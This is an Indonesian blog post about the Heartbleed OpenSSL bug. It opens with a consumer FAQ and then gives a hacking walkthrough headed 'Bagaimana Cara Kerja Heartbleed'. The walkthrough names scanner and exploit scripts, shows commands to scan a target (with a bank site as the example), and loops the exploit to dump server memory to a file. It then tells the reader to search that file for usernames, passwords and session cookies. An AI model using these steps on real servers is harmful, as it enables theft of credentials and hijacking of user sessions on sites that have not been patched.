Hacking mengunakan Metode HeartBleed BUG

JalanTikus.com-Beberapa hari lalu dunia digemparkan dengan munculnya celah keamanan paling berbahaya sepanjang sejarah Internet, yaitu Heartbleed.Sebenarnya, Apa itu Heartbleed? Ini adalah Bug, dan tentunya masih banyak orang yang bingung dengan kehebatan Bug ini.
Oleh karena itu, Jaka tertarik untuk membahasnya, terkadang ada yang menyebut Heartbleed ini adalah Virus, dan ada juga yang mengatakan bahwa Heartbleed ini dapat hack akun Facebook kamu. Tidak juga.
Berikut adalah serangkaian Fakta-fakta tentang Heartbleed.

• Hearbleed Bukanlah Sebuah Virus
  Tidak seperti yang banyak orang sangka, Heartbleed ini bukanlah virus, melainkan sebuah Bug, yaitu dimana terdapat celah keamanan pada OpenSSL.Celah tersebut muncul karena kesalahan penulisan kode dalam protokol enkripsi open-source yang digunakan oleh ribuan situs dan server di dunia.
  OpenSSL berguna untuk memastikan komunikasi antar-jaringan dapat terlindungi. Dengan adanya Bug ini, tentu celah bagi para hacker untuk menyusup akan terbuka lebar.
• Tidak Perlu Mengganti Semua Password Anda
  Ya, dengan hadirnya Heartbleed ini memang kita dituntut waspada pada setiap akun yang kita miliki, mulai dari jejaring sosial hingga perbankan, tapi bukan berarti kita harus sesegera mungkin mengganti password.INGAT!, Ganti password bertujuan hanya untuk mengamankan akun anda. Tapi jika memang situs tersebut memerintahkan anda untuk merubah password segera, turutilah, bisa jadi ada yang tidak beres dengan akun anda.
• Akun Saya Tidak Bisa Dibuka? Apa Terkena Heartbleed?
  Hadirnya Heartbleed ibarat menjadi tumbal. Semua Akun yang tidak bisa dibuka selalu dikaitkan dengan Bug ini, padahal tidak sepenuhnya benar.Bisa jadi anda ceroboh dalam melakukan sesuatu, sehingga lupa kalau pernah meninggalkan jejak disuatu tempat, sehingga akun anda kena bajak. Jadi, tidak sepenuhnya Hearbleed berperan dalam aktifitas ini.
  Jika ragu, Coba tanyakan teman anda yang memiliki Akun serupa, apakah bisa dibuka atau tidak.
• Selain Website, Heartbleed Juga Merembet ke Smartphone
  Ini adalah hal yang sangat masuk akal, Tidak hanya website, ternyata juga banyak smartohone yang kena dampaknya. Melalui apa? Tentu melalui aplikasi.Karena Heartbleed bisa mengganggu kerja server dan router web yang diterobos, yang tentunya bisa membuat Hacker berhubungan dengan server tersebut, sehingga kemungkinan pencurian data pengguna bisa diterapkan.
  Jika kamu pengguna Android, kamu bisa mengecek apakah ada dari salah satu Aplikasi kamu yang terinfeksi Heartbleed atau tidak.
• Apakah Facebook Terjangkit Heartbleed?
  Ya, Facebook adalah salah satu situs yang menggunakan SSL.Tapi, bukan berarti semua data penggunanya dapat tercuri. Pihak Facebook telah mengkonfirmasi bahwa mereka telah melakukan tindak pencegahan terhadap Bug ini, sehingga data pengguna bisa dikatakan aman.
  Tapi jika kamu ingin tetap mengganti password, ya silahkan saja, karena itu memang tindak keamanan yang tepat.
• Windows XP Lebih Mudah Terjangkit Heartbleed?
  Microsoft memang telah mengakhiri dukungan Windows XP pada 8 April 2014. Tapi bukan semata-mata Heartbleed dapat leluasa menguasai OS tersebut.Perlu kita ketahui, Microsoft mengakhiri dukungan pada Windows XP pada saat bug Heartbleed ini ditemukan.
  Lagipula, Windows XP bukanlah OS yang menggunakan OpenSSL, Microsoft membuat enkripsi yang mereka kembangkan sendiri, sehingga dampak Heartbleed tidak akan  terasa.
  
  Bagaimana Cara Kerja Heartbleed :
  
  LANGSUNG AJA GAN :v
  
  Tool: DOwnload
  -ssltest.py -scanner
  -pacemaker.py -listen handshake clients
  -heartbleed.py -exploit
  
  1. SCAN TARGET
  
  Buka Coonsole, masukan:
  "python ssltest.py <target>"
  Contoh:
  "python ssltest.py www.bank*.com"
  
  jika website vulnerability..
  
  2. (a). FIND USER AND PASS
  
  Buka console, masukan:
  "python pacemaker.py"
  Biarkan..
  
  Buka COnsole baru, masukan:
  "python heartbleed.py <target> -x 4"
  
  sekarang agan hanya perlu mencari 'private' user dan pass website tersebut
  
  2. (b) FIND COOKIE-SESSIONS
  
  Buka console, Masukan:
  "python pacemaker.py"
  biarkan..
  
  Buka console baru, masukan:
  "while true; do python heartbleed.py <target> >> /root/out1 ; sleep 5; done"
  biarkan..
  
  Buka console baru, masukan:
  "tail -f /root/out1"
  
  Sekarang agan hanya perlu mencari cookie-sessions website tersebut.
  
  catatan: untuk memudahkan anda mencari, klik 'Search' pada menu bar console -> 'Find' dan ketikan 'user' atau 'cookie' pada kotak find
  
  NOTE: "TINDAKAN ANDA = TANGGUNG JAWAB ANDA" *sekian semoga bermanfaat
  
  

Thank to : Borneohacker, jalan tikus.com